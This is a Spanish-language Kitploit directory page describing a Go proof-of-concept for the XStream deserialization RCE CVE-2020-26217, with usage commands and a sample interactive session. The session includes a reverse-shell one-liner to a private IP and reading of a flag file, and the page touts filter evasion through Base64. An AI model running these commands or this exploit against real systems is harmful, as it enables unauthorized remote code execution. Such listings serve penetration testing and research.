Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-26217-XStream — CVE-2020-26217 PoC de deserialización de XStream | Kitploit
Herramientas/GitHubGitHub/kairo-one/cve-2020-26217-xstream
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubkairo-one/cve-2020-26217-xstream

CVE-2020-26217-XStream

CVE-2020-26217 PoC de deserialización de XStream

Ver Repositorio
2hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-26217 XStream RCE Exploit

Herramienta de explotación de la vulnerabilidad de ejecución remota de código en XStream.

Descripción de la vulnerabilidad

CVE-2020-26217 es una vulnerabilidad de deserialización en la librería XStream que permite a un atacante ejecutar código remoto mediante la construcción de datos XML maliciosos.

Versiones afectadas: XStream <= 1.4.13

Uso

root@kitploit:~
go run poc.go <目标URL>

Ejemplo

root@kitploit:~
# 运行工具
go run poc.go http://target.com:8080/?data

# 进入交互模式后输入命令
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit

Características

  • Ejecución interactiva de comandos
  • Parseo automático del nombre de los parámetros de la URL
  • Codificación Base64 para evadir el filtrado de caracteres especiales
  • Soporte para HTTPS (omite la verificación del certificado)

Compilación

root@kitploit:~
go build -o poc poc.go

Descargo de responsabilidad

Esta herramienta está destinada únicamente a la investigación de seguridad y pruebas autorizadas. No la utilice con fines ilegales. El usuario asume toda la responsabilidad legal correspondiente.

Descargar herramienta